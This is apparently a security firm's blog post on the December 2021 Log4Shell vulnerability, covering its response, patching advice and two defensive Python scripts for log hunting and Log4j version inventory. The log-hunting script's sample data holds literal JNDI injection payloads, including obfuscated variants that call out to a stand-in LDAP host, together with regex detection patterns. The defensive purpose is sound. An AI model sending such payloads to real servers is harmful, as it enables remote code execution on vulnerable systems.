December 9th, 2021 may turn out to be one of those days that, a decade from now, you remember where you were and what you were doing when you heard the news: A high-severity vulnerability was discovered in Log4j, an open-source Java logging library developed by the Apache Foundation.

What has made this zero-day vulnerability so special? We hear of significant cyberattacks on an almost daily basis, but why is Log4Shell—the name of this vulnerability—rated a 10-out-of-10 in severity? 

Well… do you have a kid addicted to Minecraft? Do you use Amazon, Steam, Twitter, LinkedIn or an iPhone? Do you drive a Tesla? Uh oh… you get the gist. The problem with this particular exploit is that, according to ZDNet, “Basically any device that’s exposed to the internet is at risk if it’s running Apache Log4j, versions 2.0 to 2.14.1.” Log4j is used by many organizations in their Java programs for both server and client applications. To get a sense of how popular the Log4j library is with developers, you need look no further than the helpful and comprehensive list of “all known vulnerable and not vulnerable software” posted by the Netherlands’ National Cyber Security Centrum (NCSC). Suffice it to say, the list of “vulnerable” software is overwhelming.

You can’t blame developers for using open-source libraries like Log4j. Using open-source software can dramatically speed up the application development process and, in today’s digital world, speed and agility are rewarded with fast time-to-market and competitive advantage. According to Boston Consulting Group (BCG), “As many as 80% of IT departments plan to increase their use of open-source software over the next 12 months, with 95% of IT specialists agreeing that open source has become strategically important.” In the same blog where this was reported, BCG went on to say that, “In 2020, over 56 million developers worked on the 140 million projects listed on GitHub, the leading platform for open source collaboration”. But—as Log4Shell reminds us—open-source software and libraries can bring with them risks that could potentially open the floodgates to bad actors.

In fact, since proof-of-concept (PoC) exploit code for Log4j was made public, threat actors have been acting like kids in a candy store, racing to develop their own exploits to load DDoS malware, trojans, cryptominers and ransomware, with Khonsari being the newest group. This threat is on track to be even bigger than Heartbleed was when it was disclosed in April 2014, with over 50 variants of the Log4j exploit already weaponized and being used in the wild.

Our Security Experts Are Your Front Line

As a Managed Detection and Response (MDR) services provider committed to stopping security incidents before they can do harm to our clients’ organizations, we kicked into high gear the moment the Log4Shell vulnerability was discovered and we started detecting probing and exploitation attempts. Our experienced team of security analysts, threat hunters and incident responders knew they were seeing something new and scary, and immediately began taking action to protect Pondurance clients from the threat. 

The security experts that staff the Pondurance Security Operations Center (SOC) 24/7/365 communicate with clients continually through the Scope platform, which provides clients with a window into the security services, information, threat intelligence, data and analytics being provided by Pondurance. It was here that we began communicating what we were seeing with Log4Shell, and where we can receive and respond to specific questions or concerns as they arise.  

Some of the immediate actions we’re taking and have communicated to clients through Scope include:

  • On the network side, we have network signatures and analytics in place to detect identified scanning payloads and uncover exploitation attempts. The SOC has created a dashboard to track these attempts. 
  • Within our log service, we are actively reviewing available applicable logs to identify exploit and scan attempts, looking closely at network connections to see if any of the payloads are being successfully executed, and separating out real issues from false alarms.
  • New Nessus plugins were released, and we installed them to aid in the identification of affected systems. Due to the risk and severity of Log4Shell, Pondurance will be rescanning its clients’ external environments using the updated set of plugins, and we will notify clients of any critical findings related to this vulnerability. (These actions are taken as part of our Vulnerability Management Program, a key element of our MDR services.)
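To make the log-review step above concrete, here is an added example (not Pondurance tooling, and not code from the original post) of the kind of check an analyst runs over web server access logs: it percent-decodes each line, collapses the nested lookup tricks that a plain substring match misses, and reports the client address plus the callback host each JNDI lookup would reach out to. The access log lines, the client addresses (documentation IP ranges) and the callback host are all constructed for the example; the normalizer emulates only the `${x:-default}`, `lower:` and `upper:` lookups, so other encodings are an assumed gap it does not cover.

```python
"""Hunt for Log4j JNDI lookup strings in web server access logs, normalising the nested
lookup tricks (${lower:j}, ${::-j}, percent-encoding) that a plain substring match misses.
Example code added to this post; the log lines below are constructed, using documentation
IP ranges, and are not real client data."""
import re
from urllib.parse import unquote

# Constructed Apache-style access log: three probes (plain, nested-lookup, percent-encoded)
# followed by one ordinary request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:03:14:07 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"
203.0.113.7 - - [10/Dec/2021:03:14:09 +0000] "GET /${${lower:j}ndi:ldap://198.51.100.23:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79.1"
203.0.113.8 - - [10/Dec/2021:03:15:00 +0000] "GET /%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fc%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2021:03:15:30 +0000] "GET /index.html HTTP/1.1" 200 2048 "https://example.com/" "Mozilla/5.0"
"""

INNERMOST = re.compile(r"\$\{([^${}]*)\}")          # a ${...} with nothing nested inside it
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
CALLBACK_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns)\s*:\s*//([^/}\s]+)", re.IGNORECASE)


def _resolve_one(m):
    """Emulate the only lookups that matter for de-obfuscation: ${x:-default} and the
    lower:/upper: case converters. Anything else is left untouched."""
    body = m.group(1)
    if ":-" in body:                       # ${env:NOPE:-j} and ${::-j} both evaluate to "j"
        return body.split(":-", 1)[1]
    for prefix in ("lower:", "upper:"):
        if body.lower().startswith(prefix):
            return body[len(prefix):]      # case is irrelevant because matching is case-insensitive
    return m.group(0)


def normalize_lookups(text, max_rounds=20):
    """Collapse nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve_one, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_jndi_probe(line):
    """True if the line carries a JNDI lookup after percent-decoding and de-nesting."""
    return bool(JNDI_RE.search(normalize_lookups(unquote(line))))


def scan_log(text):
    """Return one hit per suspicious line: line number, client IP and the callback
    host:port the lookup would reach out to (useful for egress blocking and hunting)."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        norm = normalize_lookups(unquote(line))
        if not JNDI_RE.search(norm):
            continue
        cb = CALLBACK_RE.search(norm)
        hits.append({"line": n, "client": line.split(" ", 1)[0],
                     "callback": cb.group(1) if cb else None})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h['line']}: client {h['client']} -> callback {h['callback']}")
```

A hit in the log is evidence of an attempt, not of success; the follow-up is the network check described above, namely whether the host actually made an outbound connection to the extracted callback address. The callback list also feeds the firewall block recommended later in this post.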

What Can You Do Now?

As far as remediating the Log4Shell vulnerability is concerned, the key action for you to take is patching. The initial patch released by Apache was unfortunately incomplete and was itself found to be vulnerable, but the latest patch release, Log4j 2.16.0, is now available and appears to have fixed any outstanding issues.

A few other tips:

  • Apply recommended patches as soon as they become available from your vendors
  • Consult with all third-party vendors regarding their exposure to the Log4j vulnerabilities
  • For in-house Java applications, upgrade the Log4j library to version 2.16.0
  • If possible, utilize your existing web application firewall (WAF) to block payloads (although threat actors can utilize obfuscation)
  • If possible, block outbound LDAP queries in your firewall
  • If patching is not possible for whatever reason, we strongly recommend isolating the system from the Internet. Apache also suggested some mitigation steps if you can’t patch.
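Before you can upgrade in-house applications to 2.16.0 you have to know where Log4j actually lives, and it is frequently buried inside WAR files and shaded “fat” JARs whose file names say nothing about it. The following is an added example (not Pondurance’s scanner or code from the original post) of an inventory script that walks a directory tree, opens every archive, recurses into archives nested inside archives, reads the log4j-core version from its Maven `pom.properties`, and flags anything below 2.16.0 as needing an upgrade, in line with the guidance above. It also records whether the `JndiLookup` class is still present, since Apache’s documented no-patch mitigation for older 2.x releases removes it. The sample archives the script builds are constructed stand-ins containing only metadata, not real Log4j distributions.

```python
"""Inventory Log4j versions across a directory of JAR/WAR/EAR archives, recursing into
archives nested inside other archives, and flag anything older than 2.16.0.
Example code added to this post; the sample archives it builds are constructed stand-ins."""
import io
import re
import tempfile
import zipfile
from pathlib import Path

FIXED_VERSION = (2, 16, 0)   # the release the post recommends upgrading to
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
NAME_RE = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")

def version_from_pom(zf):
    """Read log4j-core's Maven pom.properties; shaded fat jars keep it even when the
    jar name says nothing about Log4j. Returns (major, minor, patch) or None."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "version":
            m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", value.strip())
            return tuple(map(int, m.groups())) if m else None
    return None

def scan_archive(zf, location):
    """Yield one finding per log4j-core found in zf, descending into nested archives."""
    version = version_from_pom(zf)
    if version is None:                      # fall back to the conventional file name
        m = NAME_RE.search(location)
        version = tuple(map(int, m.groups())) if m else None
    if version is not None:
        yield {
            "location": location,
            "version": version,
            "needs_upgrade": version < FIXED_VERSION,
            # Apache's documented no-patch mitigation for older 2.x removes this class
            "jndi_lookup_class": JNDI_CLASS in zf.namelist(),
        }
    for info in zf.infolist():
        if info.filename.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(info)))
            except zipfile.BadZipFile:
                continue
            yield from scan_archive(inner, f"{location}!/{info.filename}")

def scan_tree(root):
    """Walk a directory tree and collect findings from every archive in it."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(scan_archive(zf, str(path)))
            except zipfile.BadZipFile:
                continue
    return findings

def _make_jar(target, version=None, keep_jndi_class=True, nested=None):
    """Write a constructed archive with just enough metadata to exercise the scanner."""
    with zipfile.ZipFile(target, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"version={version}\n")
            if keep_jndi_class:
                zf.writestr(JNDI_CLASS, b"placeholder, not real bytecode")
        for name, data in (nested or {}).items():
            zf.writestr(name, data)

def build_demo_tree(root):
    """Constructed sample deployment: two plain jars, a WAR bundling an old log4j-core,
    a shaded jar with the JndiLookup class removed, and an unrelated library."""
    root = Path(root)
    (root / "lib").mkdir(parents=True, exist_ok=True)
    _make_jar(root / "lib" / "log4j-core-2.14.1.jar", "2.14.1")
    _make_jar(root / "lib" / "log4j-core-2.16.0.jar", "2.16.0")
    _make_jar(root / "lib" / "commons-lang3-3.12.0.jar")
    inner = io.BytesIO()
    _make_jar(inner, "2.13.3")
    _make_jar(root / "app.war", nested={"WEB-INF/lib/log4j-core-2.13.3.jar": inner.getvalue()})
    _make_jar(root / "service-all.jar", "2.14.1", keep_jndi_class=False)

def demo():
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_tree(tmp)

if __name__ == "__main__":
    for f in demo():
        status = "UPGRADE" if f["needs_upgrade"] else "ok"
        ver = ".".join(map(str, f["version"]))
        print(f"{status:8} {ver:8} jndi_class={f['jndi_lookup_class']!s:5} {f['location']}")
```

Point `scan_tree()` at an application server’s deployment directory rather than `demo()` to inventory a real host. Two caveats: the script reads version metadata only, so a shaded jar that has been repackaged without `pom.properties` will be missed unless its file name follows the `log4j-core-x.y.z.jar` convention, and Log4j classes exploded directly onto disk (not inside an archive) are outside what it walks. Authenticated vulnerability scanner plugins, like the Nessus ones mentioned above, remain the authoritative check; this is a quick local triage.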

From the perspective of Incident Response, keep in mind that there will be lingering effects of the vulnerability’s existence that persist post-mitigation/patching. Right now, opportunistic attackers are using this vulnerability to plant backdoors everywhere they can, with the plan to exploit their access in the future. Mitigation and patching aren’t sufficient on their own; you need to perform a compromise assessment of affected systems following mitigation before you can be fully confident that the risk has been addressed.

The Log4Shell vulnerability is being covered extensively by the media right now, as well it should be. The key thing we want to convey to our clients is that we’re on it; this is a terrible exploit, but the team in the Pondurance SOC has the tools to monitor what’s happening, the combination of technology and human intelligence to mitigate the threat and the incident response know-how to help you weather this storm should you “fall victim”. If you’re a Pondurance client, pay close attention to what we communicate through Scope, and be in touch with your own questions and concerns.

Resources You Should Check Out

We’ll keep providing updates as necessary to address the Log4Shell situation, but a couple of good resources worth checking out include:

  • The Cybersecurity & Infrastructure Security Agency, or CISA, which has created a web page with lots of helpful links and specific guidance on how to address this extremely critical vulnerability. It’s worth noting that Pondurance Board Chair, Niloofar Razi Howe, was recently named to the CISA Cybersecurity Advisory Committee (CSAC).
  • Crowell & Moring LLP, an international law firm with specific expertise in cybersecurity, will be hosting the webinar “The Log4j Vulnerability: What You Need to Know to Protect Your Business”, on Friday, December 17, 2021 at 12:00pm ET. Leaders from Pondurance will be part of an expert panel discussing what companies need to do to respond to this threat, and how to stay ahead of it. Interested parties can register here to attend.

We can’t sugar-coat the Log4Shell vulnerability—it’s bad. In the same way some people are compelled to combat disease by becoming doctors or medical researchers, and others are driven to serve their communities through non-profits, the team at Pondurance is committed to fighting cyber threats with you.